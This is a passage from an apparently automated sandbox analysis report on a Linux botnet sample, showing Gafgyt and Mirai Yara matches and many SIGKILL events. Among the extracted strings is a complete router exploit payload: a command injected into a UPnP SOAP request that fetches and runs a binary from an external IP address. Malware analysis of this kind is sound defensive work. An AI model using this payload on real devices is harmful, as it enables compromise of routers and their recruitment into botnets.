HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: skid.x86.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: skid.x86.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

Network traffic detected: HTTP traffic on port 48202 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 797, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 802, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1480, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1482, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1604, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1748, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1751, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1755, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1765, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1804, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1832, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1866, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1875, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1879, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1881, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1884, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1891, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1906, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1921, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1922, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1925, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1930, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1940, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1944, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1946, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1969, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1982, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2926, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2972, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2974, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3095, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3104, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3117, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3122, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3161, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3162, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3163, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3164, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3165, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3170, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3182, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3208, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3209, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3212, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3225, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3246, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3300, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3327, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3336, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3342, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3375, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3413, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3420, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3424, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3429, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3434, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3448, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3631, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5458, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5460, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5462, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5499, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5503, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5504, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5507, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5523, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5539, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5540, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5544, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5545, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5546, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5566, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5605, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5611, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5613, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5614, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5615, result: successful	Jump to behavior

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: @/proc/net/tcpsshdtelnetdsystemddaemonbashsbin/fd//proc/watchdog<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample tries to kill a process (SIGKILL)

Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 793, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 797, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 802, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1480, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1482, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1604, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1748, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1751, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1755, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1765, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1804, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1832, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1866, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1875, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1879, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1881, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1884, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1891, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1906, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1921, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1922, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1925, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1930, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1940, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1944, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1946, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1969, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 1982, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2926, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2972, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 2974, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3095, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3104, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3117, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3122, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3161, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3162, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3163, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3164, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3165, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3170, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3182, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3208, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3209, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3212, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3225, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3246, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3300, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3327, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3336, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3342, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3375, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3413, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3420, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3424, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3429, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3434, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3448, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 3631, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5458, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5460, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5462, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5499, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5503, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5504, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5507, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5523, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5539, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5540, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5544, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5545, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5546, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5566, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5605, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5611, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5613, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5614, result: successful	Jump to behavior
Source: /tmp/skid.x86.elf (PID: 5436)	SIGKILL sent: pid: 5615, result: successful	Jump to behavior

Yara signature match

Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: skid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
